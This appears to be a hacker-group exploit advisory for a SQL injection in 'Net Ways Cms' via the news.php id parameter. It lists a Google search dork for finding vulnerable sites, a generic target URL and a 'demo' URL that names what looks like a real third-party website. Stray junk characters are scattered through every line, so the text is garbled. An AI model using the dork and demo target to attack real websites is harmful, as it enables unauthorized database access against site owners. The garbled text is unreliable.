################################################################################??######## 2 z& b' M v' C- [* }" H. g
# # U8 C$ _* W; W
# Exploit Title : Net Ways Cms Sql Injection Vulnerability
7 i, s; v1 Q% j! J1 U* X#
% w% k5 ^+ E8 \# Author : IrIsT.Ir " B5 J$ j: y( ]+ a' j6 J7 T
#
% i/ z9 u! p4 j+ @6 ?# Discovered By : Am!r % Y" p+ ?. Z3 y) ]
#
/ I' v( v" j0 ^* L( }; c+ W# Home : http://IrIsT.Ir/forum
4 X: J9 n- O9 o0 u L4 P#
1 o) q* c, Y' l+ c# Software Link : http://www.netways.com/ www.political-security.com
# r! D8 H5 l$ c3 ?: D. \#
/ A# L% J+ e, ]( l8 Z& @: O# Security Risk : High + D) p2 c* q: a" X! W7 [
# # R2 A1 x" ?9 Q% ~9 Y5 A
# Version : All Version . p1 ?* l& L6 m4 g( @8 D6 c& v
#
3 ?6 ]2 X! {& R* k# V& [% s# Tested on : GNU/Linux Ubuntu - Windows Server - win7 $ D7 p& R9 q2 S
#
2 Q, K: F* o+ A, e3 t9 w; W" C# Dork : intext:"Designed & developed by NetWays" 6 M1 T: i5 P# m0 t6 E7 I
# ( e3 U# l1 {* _8 |: f2 H
################################################################################??######## / R% E' |1 u+ ~) T
#
2 q6 K3 z4 U0 U, F0 m# Expl0iTs :
/ T9 v0 g: ]& y' \/ ~) Q$ o# + f6 b( Q) g8 ?2 a4 c- B8 k3 {
# http://target.com/news.php?id=[Sql] , ]8 i3 z! J- ?, D& V
# 3 `! z5 I2 {$ B' Q0 J
# $ R4 P, ~( I: v: b3 E# k* t
# D3mo :
/ |7 e0 |3 k7 c; U# D3 U- q# 8 h4 ?( W5 V' o4 M G/ h* T
# http://compagnieparento.com/news.php?id=7[Sql] & A" s& i& }6 e' X+ ?
# & s0 X/ S2 |) W6 o2 P: }8 A
################################################################################??######## ) }# H: a6 `+ X Z" T
# 5 P/ U7 n& D. m8 E2 I5 a$ Y
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
# a% Y6 X9 H4 ]: z V3 X1 R6 j. r#
& d+ e1 o% t# q# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r ' y% X+ ^3 ]$ X7 Z6 Y- }
# 4 P6 j* i- _1 D! s5 L S$ ~. N
# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
" e" R3 Z* S, I2 M0 p: I#
5 N& Z4 k% `) {% s+ e4 b( S2 x################################################################################??######## |